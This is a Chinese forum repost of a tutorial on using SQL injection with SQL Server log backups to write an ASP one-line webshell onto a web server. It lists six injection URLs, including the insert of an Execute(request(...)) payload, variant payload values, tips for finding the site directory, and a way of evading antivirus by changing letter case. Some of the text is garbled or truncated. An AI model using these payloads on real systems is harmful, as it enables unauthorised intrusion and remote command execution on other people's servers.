SQL log备份上Webshell总结

[复制链接]
查看: 238|回复: 0

SQL log备份上Webshell总结

[复制链接]
查看: 238|回复: 0
匿名  2011-9-18 18:52:14 |阅读模式

马上注册,结交更多好友,享受更多内容,了解更多户外知识,让你轻松享受户外!

您需要 登录 才可以下载或查看,没有账号?立即注册

×
SQL log备份上Webshell总结 </h1> <div id="property"> 2009-10-28 10:09:37  xueheike&#46;net  来源:<a href="" target="_blank">冰点极限&海洋顶端</a></div><!--引用地址--> 当SQL注入是得到DB权限时候,接下来可以做的工作很多,象找管理员密码,后台管理这些都可以帮助你拿到WEBSHELL,但是这篇文章讲的是log备份,LOG备份出来的小马的体积小,而且备份的成功的可性很大,所以是我作为对 &#46;&#46;&#46; <P>当SQL注入是得到DB权限时候,接下来可以做的工作很多,象找管理员密码,后台管理这些都可以帮助你拿到WEBSHELL,但是这篇文章讲的是log备份,LOG备份出来的小马的体积小,而且备份的成功的可性很大,所以是我作为对DB权限的第一种试探方法&#46;  <BR>但是在LOG备份中,我们经常会遇到一些很让我们头痛的问题,那就是闭合的问题,我在这里做个总结,也  <BR>好让我们对不能闭合的方法有一个全面的了解&#46;  </P><P>1&#46;先介绍下LOG备份,这个相信大家都很熟悉了,我还是习惯在IE里直接提交,返回正常的页面就说这一步的操作就成功了,如果没有返回正常的页面,我们就可以根据IE返回的错误来找他的原因&#46;(这里说下要将IE的错误提示给打开),LOG的格式如下所示:  <BR><A href="http://www&#46;site&#46;com/xx&#46;asp?id=xxx;alter">http://www&#46;site&#46;com/xx&#46;asp?id=xxx;alter</A> databas &#46;&#46;&#46; bsp;set RECOVERY FULL  <BR><A href="http://www&#46;site&#46;com/xx&#46;asp?id=xxx;create">http://www&#46;site&#46;com/xx&#46;asp?id=xxx;create</A> &#46;&#46;&#46; cmd (a image)--  <BR><A href="http://www&#46;site&#46;com/xx&#46;asp?id=xxx;backup">http://www&#46;site&#46;com/xx&#46;asp?id=xxx;backup</A> log databasename &#46;&#46;&#46; bsp;’c:\cmd’ with init  <BR><A href="http://www&#46;site&#46;com/xx&#46;asp?id=xxx;insert">http://www&#46;site&#46;com/xx&#46;asp?id=xxx;insert</A> into cmd ( &#46;&#46;&#46; lt;%%25Execute(request("go"))%  </P><P>%25>’)--  <BR><A href="http://www&#46;site&#46;com/xx&#46;asp?id=xxx;backup">http://www&#46;site&#46;com/xx&#46;asp?id=xxx;backup</A> log databasen &#46;&#46;&#46; ;= ’x:\xxx\xxx\asp1&#46;asp’--  <BR><A href="http://www&#46;site&#46;com/xx&#46;asp?id=xxx;drop">http://www&#46;site&#46;com/xx&#46;asp?id=xxx;drop</A> table cmd--  </P><P>分为6步操作,最容易出错的就是第4步的操作,经常返回没有闭合的问题,下面就是一些我们可以将  <BR>values中的内容可以进行更换的方式,当我们的一种方式不行的话,就可以换另一种方式,当所有的方式  <BR>都换完了,没有什么好说的,要么就放弃,要么就换另一种方式继续,想列目录找数据库下载,后台&#46;这  <BR>里就不多说了,可以提换的内容有:  <BR>a)&#46;  <BR>c)&#46;%><%  <BR>d)&#46;  <BR>e)&#46;<%25Execute(request("l"))%25>  </P><P>2&#46;LOG备份要注意的一些问题:  <BR>a)&#46;要注意你现在的机器是不是WEB主机,简单的方法就是翻他的目录,看有没有IIS安装的文件  <BR>b)&#46;当你确定你要找的确实是WEN主机时,就可以找他的站点目录了,这个也很重要,是步骤5的操作,如果备份到一个错误的目录,当然就没有办法访问了  <BR>c)&#46;备份成功后,你就eBF梢允 4着用客户端去连接,这个地方也有人弄错,现在用的字段是go,你的客户端的  <BR>相关字段也为go  <BR>d)&#46;用ececute正常备份出来的是用错误提示的,当你的显示500错误时,请你将的IE错误提示打开,当显示  <BR>Microsoft VBScript 运行时错误 错误 ’800a000d’  </P><P>类型不匹配: ’execute’  <BR>时候表示你已经成功了,连接吧!!  <BR>e)&#46;还有极端的时候你备份出来的一句话被杀(当你确定你确实是备份在WEB主机的对应目录是),你可以将  </P><P>上面的VALUES字段中的值做几个大小写转换,一般是没有问题的&#46;&#46;</P></div>
”济源户外网” www.jyhww.com 倡导“积极健康”的生活方式、崇尚“自然、和谐、真诚、友爱”的人文精神,以“自主、绿色、氧气、阳光、健康、友谊”为宗旨,由热爱生活、热爱大自然的群体组成。是户外运动者的家园,也是个人挑战自我。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|济源户外网-天韵茗茶 | 豫ICP备10211396号-1

GMT+8, 2026-8-11 08:46 , Processed in 0.020169 second(s), 18 queries .

Powered by Discuz! X3.5 Licensed

© 2001-2025 Discuz! Team.